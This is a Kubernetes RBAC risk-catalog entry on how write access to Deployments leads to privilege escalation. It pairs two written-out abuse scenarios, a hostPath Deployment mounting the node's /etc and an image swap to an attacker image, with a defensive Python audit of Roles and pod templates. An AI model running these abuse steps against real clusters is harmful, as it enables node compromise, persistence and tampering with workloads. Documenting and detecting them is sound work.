Overview

Field                    Value
ID                       1034
Name                     Manage Deployments in a namespace (potential for privileged pod execution)
Risk Category            Elevation of Privilege
Risk Level               High
Role Type                Role
API Groups               apps
Resources                deployments
Risky Verb Combinations  [create] · [update] · [patch] · [delete]
Tags                     Persistence · PotentialPrivilegeEscalation · Tampering · WorkloadLifecycle

Description

Grants permission to create, update, patch, or delete Deployments within a specific namespace. The Deployment controller creates pods from whatever pod template the Deployment carries, so a subject holding any one of these verbs can run pods with hostPath mounts, privileged containers, or host namespaces in that namespace without holding any permission on pods directly. The resulting pods run under a service account of that namespace (the template's serviceAccountName, or default) and are recreated by the controller whenever they are deleted, which provides persistence as well as a way to tamper with the applications the Deployment runs. Unless Pod Security Admission or another admission policy rejects such pod specs in the namespace, a namespaced Role with these verbs can be turned into access to the node's filesystem.

Abuse Scenarios

  1. Create a new Deployment whose pod template mounts a hostPath in the namespace. The controller creates the pod; no permission on pods is needed. Because this Role grants nothing on pods/exec, the command in the pod template itself has to do the attacker's work (reading or writing under /host-etc).
kubectl create -n <namespace> -f - <<EOF
apiVersion: apps/v1
kind: Deployment
metadata:
  name: hostpath-deployment
spec:
  replicas: 1
  selector:
    matchLabels:
      app: hostpath-app
  template:
    metadata:
      labels:
        app: hostpath-app
    spec:
      containers:
      - name: hostpath-container
        image: busybox
        command: ["/bin/sh", "-c", "sleep infinity"]
        volumeMounts:
        - mountPath: /host-etc   # the node's /etc, writable unless readOnly: true is set
          name: host-etc
      volumes:
      - name: host-etc
        hostPath:
          path: /etc
EOF
# Example: kubectl create -n development -f - <<EOF ... EOF
  2. Update an existing Deployment's image to a malicious one. kubectl set image issues a PATCH against the Deployment, so the update or patch verb alone is enough; the rollout replaces the running pods with the attacker's image while keeping the Deployment's service account, mounted secrets and network identity.
kubectl set image deployment/<deployment-name> <container-name>=<malicious-image> -n <namespace>
# Example: kubectl set image deployment/my-web-app web=attacker/web-shell -n default
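The following is an added example, not code from this risk catalog: a small offline audit that flags Role rules granting the verbs listed above on apps/deployments, and inspects a Deployment's pod template for the settings the two scenarios rely on (hostPath volumes, privileged containers, host namespaces). The Role and Deployment objects are constructed for the example and their names (deploy-manager, hostpath-deployment, priv-shell) are hypothetical; only the Python standard library is used.

```python
from typing import Dict, List, Set

# The verb combinations this entry marks as risky on apps/deployments.
RISKY_VERBS: Set[str] = {"create", "update", "patch", "delete"}


def deployment_write_verbs(role: Dict) -> Set[str]:
    """Return the risky verbs a Role (or ClusterRole) grants on apps/deployments.

    A wildcard in apiGroups, resources or verbs counts as a match.
    """
    found: Set[str] = set()
    for rule in role.get("rules", []):
        groups = set(rule.get("apiGroups", []))
        resources = set(rule.get("resources", []))
        verbs = set(rule.get("verbs", []))
        if not groups & {"apps", "*"} or not resources & {"deployments", "*"}:
            continue
        found |= RISKY_VERBS if "*" in verbs else verbs & RISKY_VERBS
    return found


def pod_template_findings(deployment: Dict) -> List[str]:
    """List privileged settings requested by a Deployment's pod template.

    The Deployment controller creates pods with exactly this spec, so a hostPath
    mount or privileged container here is as dangerous as creating the pod
    directly, unless an admission controller rejects it.
    """
    findings: List[str] = []
    pod = deployment.get("spec", {}).get("template", {}).get("spec", {})
    for key in ("hostPID", "hostNetwork", "hostIPC"):
        if pod.get(key):
            findings.append(f"pod template sets {key}=true")
    for vol in pod.get("volumes", []):
        if "hostPath" in vol:
            findings.append(
                f"volume {vol['name']!r} mounts host path {vol['hostPath'].get('path')!r}"
            )
    for ctr in pod.get("containers", []) + pod.get("initContainers", []):
        if ctr.get("securityContext", {}).get("privileged"):
            findings.append(f"container {ctr['name']!r} is privileged")
    return findings


# Constructed sample objects (hypothetical names), shaped like real API objects.
SAMPLE_ROLE = {
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "Role",
    "metadata": {"name": "deploy-manager", "namespace": "development"},
    "rules": [
        {"apiGroups": ["apps"], "resources": ["deployments"],
         "verbs": ["get", "list", "create", "patch"]},
        {"apiGroups": [""], "resources": ["configmaps"], "verbs": ["get"]},
    ],
}

READ_ONLY_ROLE = {
    "kind": "Role",
    "rules": [{"apiGroups": ["apps"], "resources": ["deployments"],
               "verbs": ["get", "list", "watch"]}],
}

HOSTPATH_DEPLOYMENT = {  # same shape as scenario 1 above
    "kind": "Deployment",
    "spec": {"template": {"spec": {
        "containers": [{"name": "hostpath-container", "image": "busybox",
                        "volumeMounts": [{"mountPath": "/host-etc", "name": "host-etc"}]}],
        "volumes": [{"name": "host-etc", "hostPath": {"path": "/etc"}}],
    }}},
}

PRIVILEGED_DEPLOYMENT = {
    "kind": "Deployment",
    "spec": {"template": {"spec": {
        "hostPID": True,
        "containers": [{"name": "priv-shell", "image": "busybox",
                        "securityContext": {"privileged": True}}],
    }}},
}

SAFE_DEPLOYMENT = {
    "kind": "Deployment",
    "spec": {"template": {"spec": {
        "containers": [{"name": "web", "image": "nginx",
                        "securityContext": {"allowPrivilegeEscalation": False}}],
    }}},
}


if __name__ == "__main__":
    print("risky verbs granted:", sorted(deployment_write_verbs(SAMPLE_ROLE)))
    for d in (HOSTPATH_DEPLOYMENT, PRIVILEGED_DEPLOYMENT, SAFE_DEPLOYMENT):
        print(pod_template_findings(d) or ["no privileged settings"])
```

To confirm a binding on a live cluster rather than from exported YAML, the equivalent check is kubectl auth can-i create deployments.apps -n <namespace> --as=<user-or-serviceaccount>. Note that pod_template_findings reports what the template requests, not what will run: a namespace enforcing the Pod Security "baseline" level rejects both the hostPath volume and the privileged container when the controller tries to create the pods, even though the Deployment object itself is admitted with a warning.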